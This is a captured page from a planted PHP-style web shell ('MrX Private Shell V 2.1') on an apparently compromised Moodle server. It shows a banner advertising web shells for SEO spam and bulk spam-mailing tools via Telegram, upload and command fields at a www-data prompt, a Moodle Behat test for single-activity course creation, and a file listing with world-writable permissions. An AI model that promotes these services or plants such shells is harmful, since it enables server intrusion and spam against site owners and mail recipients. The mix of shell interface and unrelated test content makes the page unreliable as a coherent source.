__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@format @format_singleactivity
Feature: Courses can be created in Single Activity mode
  In order to create a single activity course
  As a manager
  I need to create courses and set default values on them

  Scenario: Create a course as a custom course creator
    Given the following "users" exist:
      | username  | firstname | lastname | email          |
      | kevin  | Kevin   | the        | kevin@example.com |
    And the following "roles" exist:
      | shortname | name    | archetype |
      | creator   | Creator |           |
    And the following "system role assigns" exist:
      | user   | role    | contextlevel |
      | kevin  | creator | System       |
    And the following "role capability" exists:
      | role                           | creator |
      | moodle/course:create           | allow   |
      | moodle/course:update           | allow   |
      | moodle/course:manageactivities | allow   |
      | moodle/course:viewparticipants | allow   |
      | moodle/role:assign             | allow   |
    And I enable "subsection" "mod" plugin
    When I log in as "kevin"
    And I am on site homepage
    And I press "Add a new course"
    And I set the following fields to these values:
      | Course full name  | My first course |
      | Course short name | myfirstcourse |
      | Format | Single activity |
    And I press "Update format"
    Then I should see "Quiz" in the "Type of activity" "field"
    And I should see "Forum" in the "Type of activity" "field"
    # Check that not all the activity types are in the dropdown.
    And I should not see "Text and media" in the "Type of activity" "field"
    And I should not see "Subsection" in the "Type of activity" "field"
    And I set the field "Type of activity" to "Quiz"
    And I press "Save and display"
    And I should see "New Quiz"

Filemanager

Name Type Size Permission Actions
activity_navigation.feature File 4.84 KB 0777
create_course.feature File 1.79 KB 0777
edit_format_course.feature File 1.4 KB 0777
Filemanager